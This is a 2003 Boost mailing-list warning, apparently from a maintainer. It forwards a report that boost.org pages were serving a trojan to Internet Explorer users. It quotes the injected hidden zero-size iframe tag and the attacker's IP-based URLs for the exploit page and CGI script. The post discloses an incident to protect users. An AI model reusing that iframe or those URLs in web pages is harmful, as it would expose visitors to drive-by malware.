I have confirmed that the problem reported below is occurring: Please take extreme care in using the Boost website until we've corrected it. The web pages are unmodified on the server itself, so we have to wait for Beman to contact the ISP.
Sorry, Dave ---- From: turbotrup256 <[EMAIL PROTECTED]> Subject: malicious content on www.boost.org To: [EMAIL PROTECTED] Date: Mon, 28 Jul 2003 15:31:29 -0400 Hello, The www.boost.org site is currently spreading some trojan among MS IE clients. All html pages have the following tag appended: iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0 This leads to a cgi script: http://216.247.117.114/cgi-bin/readme.pl which does exploit some *very bad* IE vulnerability, and runs some executable code, as far as I can see "AICORE" trojan carrying something else. Please forgive me this obviously OT post. :) -- Dave Abrahams Boost Consulting www.boost-consulting.com _______________________________________________ Unsubscribe & other changes: http://lists.boost.org/mailman/listinfo.cgi/boost
